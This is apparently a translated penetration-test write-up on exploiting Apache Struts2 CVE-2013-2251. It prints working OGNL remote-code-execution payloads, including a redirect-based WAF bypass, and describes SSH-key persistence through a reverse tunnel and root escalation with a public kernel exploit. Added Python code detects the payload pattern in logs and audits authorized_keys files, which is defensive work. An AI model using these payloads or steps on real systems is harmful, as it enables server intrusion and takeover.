
How to take advantage of Struts2 loophole to bypass firewall to obtain Root permission

2025-02-24 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

Many people with little experience do not know how Struts2 vulnerabilities can be used to bypass a firewall and obtain root permissions, so this article walks through the causes of the problem and how it was resolved. I hope that after reading it you will be able to deal with this problem yourself.

The Apache Struts2 vulnerability CVE-2013-2251 has been widely abused because it leads to remote code execution. The flaw is triggered by manipulating parameters prefixed with "action:", "redirect:" or "redirectAction:", which allows remote code execution in Struts versions lower than 2.3.15. In this test, I not only bypassed the WAF to obtain remote code execution, but also exploited a Linux privilege escalation vulnerability to gain root control of the target server. The whole process is as follows:

The constructed Payload is intercepted by the WAF

First of all, while testing a travel booking website, I found that the site ran a vulnerable Apache Struts framework, and I tested the vulnerable parameters "action", "redirect" and "redirectAction". To exploit the vulnerability I needed to construct an OGNL expression. I took some inspiration from a reference site and constructed a valid Payload that executes the command "ifconfig":

redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'ifconfig'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}

However, as expected, the above Payload was blocked by the application-layer firewall in front of the target server, which returned the following response page:

At this point I prefer to analyze the problem from the root. As mentioned above, "redirect" is one of the vulnerable parameters, and the Payload above was built on that "redirect" parameter. So let's run a plain redirect test against the target website and redirect the request to the hypothetical site http://www.goal.com, as follows:

Constructing a Payload to bypass the WAF

As you can see, the final response is a 302 redirect to the hypothetical site http://www.goal.com. The direct Payload above is blocked by the firewall, but the redirect itself goes through, so could a combination of the two get around the firewall? That gives the following Payload:

redirect:http://www.goal.com/${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'ifconfig'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}

The request sent during the test is as follows:

Judging by the response, I was able to bypass the firewall and execute the ifconfig command. Haha, time to cheer!
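From the defender's side, the lesson of the bypass above is that a filter anchored on "redirect:${" misses an expression placed later in the parameter. The following added example (my own code, not from the original post) scans constructed access-log lines for the three DefaultActionMapper prefixes named in the article and for OGNL markers anywhere in the parameter, after percent-decoding; the client address 203.0.113.5 and the log lines are constructed, while www.goal.com is the hypothetical host from the article.

```python
"""Flag Struts2 DefaultActionMapper prefix abuse (CVE-2013-2251 pattern) in access-log lines."""
import re
from urllib.parse import unquote

PREFIXES = ("action:", "redirect:", "redirectAction:")
OGNL_MARKER = re.compile(r"[$%]\{")  # start of a ${...} or %{...} expression


def decode_fully(s: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def inspect_query(query: str) -> list:
    """Return one finding per parameter that uses a Struts prefix or carries an OGNL marker."""
    findings = []
    for param in query.split("&"):
        name, _, value = param.partition("=")
        name, value = decode_fully(name), decode_fully(value)
        prefix = next((p for p in PREFIXES if name.startswith(p)), None)
        # The '=' inside an expression splits it across name and value, so inspect both.
        has_ognl = bool(OGNL_MARKER.search(name + "=" + value))
        if prefix or has_ognl:
            findings.append({"param": name[:60], "prefix": prefix, "ognl": has_ognl})
    return findings


LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>[^ ?"]+)(?:\?(?P<query>[^ "]*))? HTTP/')


def scan_log(lines):
    """Yield (path, findings) for each request line with a suspicious parameter."""
    for line in lines:
        m = LOG_RE.search(line)
        if not m or not m.group("query"):
            continue
        findings = inspect_query(m.group("query"))
        if findings:
            yield m.group("path"), findings


# Constructed sample access-log lines (not taken from the original post).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2014:10:00:00 +0000] "GET /book.action?q=paris HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jun/2014:10:00:01 +0000] "GET /book.action?redirect:%24%7B%23a%3D1%7D HTTP/1.1" 403 0',
    '203.0.113.5 - - [01/Jun/2014:10:00:02 +0000] "GET /book.action?redirect:http://www.goal.com/%24%7B%23a%3D1%7D HTTP/1.1" 302 0',
    '203.0.113.5 - - [01/Jun/2014:10:00:03 +0000] "GET /book.action?redirectAction:login HTTP/1.1" 302 0',
]
```

The third sample line is the shape that slipped past the anchored filter; the "prefix without OGNL" case is still reported because these prefixes have no legitimate use on a patched Struts.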

Getting a shell over SSH

All right, next I tried to obtain remote administrative access. I used a reverse SSH tunnel together with public key authentication, which lets an SSH user log in without typing a password. To do this I needed to put the SSH public key of my AWS test server into the target server's list of authorized keys, ~/.ssh/authorized_keys, and, to authenticate myself for the reverse SSH connection, I also had to add the target server's id_rsa.pub public key to my test server. See the public key authentication documentation for background on the concept involved here.

id_rsa.pub is a user's identity public key; adding it to the authorized_keys file on another host allows logging in to that host as the corresponding user. authorized_keys is the list of public keys that are permitted to log in as a specific user on that particular server.

The first step is to obtain the id_rsa.pub file from the target server:

The second step is to copy the authorized_keys file to my AWS test server:

The third step is to copy the constructed authorized_keys file from my AWS test server back to the target server:

Finally, use SSH to establish the reverse connection:
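The persistence step above works by appending a key to ~/.ssh/authorized_keys, so an appended key is the artifact a defender can look for. The following added example (my own code, not from the original post) parses an authorized_keys file, computes OpenSSH-style SHA256 fingerprints, and reports entries absent from an allowlist; the key blobs and the "ec2-user@aws-test" comment are constructed and are not real keys.

```python
"""Audit an OpenSSH authorized_keys file against an allowlist of key fingerprints."""
import base64
import hashlib
import struct

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
             "ecdsa-sha2-nistp521", "ssh-dss"}


def fingerprint(key_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 public-key blob."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str):
    """Yield (options, key_type, fingerprint, comment) for each key line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        # Options such as from="..." precede the key type; locate the first known type token.
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            continue  # malformed line: no key type or no key material
        options = " ".join(tokens[:idx])
        key_type, key_b64 = tokens[idx], tokens[idx + 1]
        yield options, key_type, fingerprint(key_b64), " ".join(tokens[idx + 2:])


def find_unexpected_keys(text: str, allowed_fingerprints: set) -> list:
    """Return entries whose fingerprint is not on the allowlist."""
    return [{"type": kt, "fingerprint": fp, "comment": c, "options": o}
            for o, kt, fp, c in parse_authorized_keys(text)
            if fp not in allowed_fingerprints]


def _fake_ed25519_blob(seed: bytes) -> str:
    """Constructed blob in OpenSSH wire format (string type, string key); not a usable key."""
    key = hashlib.sha256(seed).digest()  # 32 arbitrary bytes standing in for a public key
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + key
    return base64.b64encode(blob).decode()


# Constructed sample file: one expected admin key and one key that was appended later.
SAMPLE_AUTHORIZED_KEYS = (
    "# admin workstation\n"
    f"ssh-ed25519 {_fake_ed25519_blob(b'admin')} admin@corp\n"
    f'from="203.0.113.0/24",no-pty ssh-ed25519 {_fake_ed25519_blob(b"unknown")} ec2-user@aws-test\n'
)
ALLOWED = {fingerprint(_fake_ed25519_blob(b"admin"))}
```

Running find_unexpected_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWED) reports only the appended ec2-user@aws-test entry together with its fingerprint and options.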

Escalating to root

As you can see, I now had remote administrative access, but not as the root user. To obtain root privileges, let's first look at the Linux kernel version on the target server:

It is version 2.6.32. A Google search for matching vulnerabilities turned up a corresponding local privilege escalation vulnerability: https://github.com/realtalk/cve-2013-2094. Finally, I compiled and ran the exploit to escalate to root:

That concludes the penetration test, in which I exploited the Apache Struts 2 vulnerability, bypassed the WAF, and combined it with a Linux privilege escalation vulnerability.

After reading the above, do you understand how a Struts2 vulnerability can be used to bypass a firewall and obtain root permissions? If you want to learn more, you are welcome to follow the industry information channel. Thank you for reading!

© 2024 shulou.com SLNews company. All rights reserved.